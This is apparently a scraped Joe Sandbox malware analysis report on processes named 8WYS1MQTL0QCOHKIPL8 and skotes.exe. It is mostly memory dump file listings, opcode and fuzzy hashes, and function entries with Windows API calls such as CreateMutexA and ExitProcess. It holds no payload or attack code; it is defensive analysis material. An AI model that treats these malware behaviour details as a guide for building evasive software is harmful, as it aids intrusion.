Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8cc4b9a3eb7469e98153d6d9f1e8733b954b5b212fb589d64dc546585c6b050
Instruction ID: 8c6db927f6e2e9faad154d69c8233a8619cfc28b9f03c9e48565d1a7a680d5fc
Opcode Fuzzy Hash: f8cc4b9a3eb7469e98153d6d9f1e8733b954b5b212fb589d64dc546585c6b050
Instruction Fuzzy Hash: 6481EB71A00245CFDB15CF69D890BBEBBB1FB5A305F1802AADC50A7352C7359989CBB1

Function 00D98860 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 872d83e94c82dda2fa1a176f80387e727565090c3af2088dd9bd2dcb27345ec3
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 26112B7770018243EF048A2DF8B45B7A799EBC77217AC437AD0824B758DA22D945B670

Function 05430A45 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2363034422.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5430000_8WYS1MQTL0QCOHKIPL8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9480b82440e5f60a0bcc4679fd125f98900ac955828c551a13147f3a776a7d89
Instruction ID: 024f3019fff13cc5b7dd27914591809caddf8ca6a42326d4b7c01b1ac5bbb963
Opcode Fuzzy Hash: 9480b82440e5f60a0bcc4679fd125f98900ac955828c551a13147f3a776a7d89
Instruction Fuzzy Hash: 2601A2E724D051BEF206D5467B2A9FA672EE6E9330334853BF40BC6563E2890E1E4170

Function 00D8A302 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 9a53f9882d69417247eb0d2977ca31a5c1ef46a1449b08667ad4e61ed9ce3b85
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: A7E08C32921228EBCB14EBDCC90499AF7ECEB49B11B650097F501D3150C270DE00C7E0

Function 00D52EC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00D52F5F
GetCurrentThreadId.KERNEL32 ref: 00D52F7E
__Mtx_unlock.LIBCPMT ref: 00D52FCC
__Cnd_broadcast.LIBCPMT ref: 00D52FE3
__Mtx_unlock.LIBCPMT ref: 00D530F5
GetCurrentThreadId.KERNEL32 ref: 00D53132
__Mtx_unlock.LIBCPMT ref: 00D5319B

Memory Dump Source

Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: ed050e6bab824ce5f939f5e64cf8bc28bf4aea001bc5be15f67e0798f32dcb5d
Instruction ID: b31fbe18b47f6ec2a8a5529b722c0155b7ecbdbf706feb53fa79849c3151fe7a
Opcode Fuzzy Hash: ed050e6bab824ce5f939f5e64cf8bc28bf4aea001bc5be15f67e0798f32dcb5d
Instruction Fuzzy Hash: 9EA1BF71A017159FDF20DFB9C944B6AB7A8EF15351F084129EC15D7291EB31EA08CBB1

Function 00D6BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00D6BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 00D6BBE4
_xtime_get.LIBCPMT ref: 00D6BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 00D6BC13

Memory Dump Source

Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: bdfeecb16ad16f5b8ae009b8d1d4696267d323cdfc1847a02ad22d609de0d85e
Instruction ID: 173ee21ecea093a8c618173f43f82dcfe81c4cd7c3b43ae23d011def59a12ffd
Opcode Fuzzy Hash: bdfeecb16ad16f5b8ae009b8d1d4696267d323cdfc1847a02ad22d609de0d85e
Instruction Fuzzy Hash: 30213E71A11219AFDF00EFA4DC969BEBBB9EF08710F511426F941B7261DB309D419BB0

Analysis Process: skotes.exePID: 5840, Parent PID: 6460COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1846
Total number of Limit Nodes:	15

Executed Functions

Function 007B652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,007B652A,?,?,?,?,?,007B7661), ref: 007B6567

Memory Dump Source

Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 41caf02e8397a7949ddf8c51e54a92423c0e8baf96fbc7c9762eaeb53808d61c
Instruction ID: 611c6f72caa13b52f0b36d517ccf0704987085d0b0b2ffaddf4b573ff1476b32
Opcode Fuzzy Hash: 41caf02e8397a7949ddf8c51e54a92423c0e8baf96fbc7c9762eaeb53808d61c
Instruction Fuzzy Hash: 28E08C30002208BFCE367B18C96DFC93B69EF41745F001821FE5886226CB2DEDA1C680

Function 00789BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
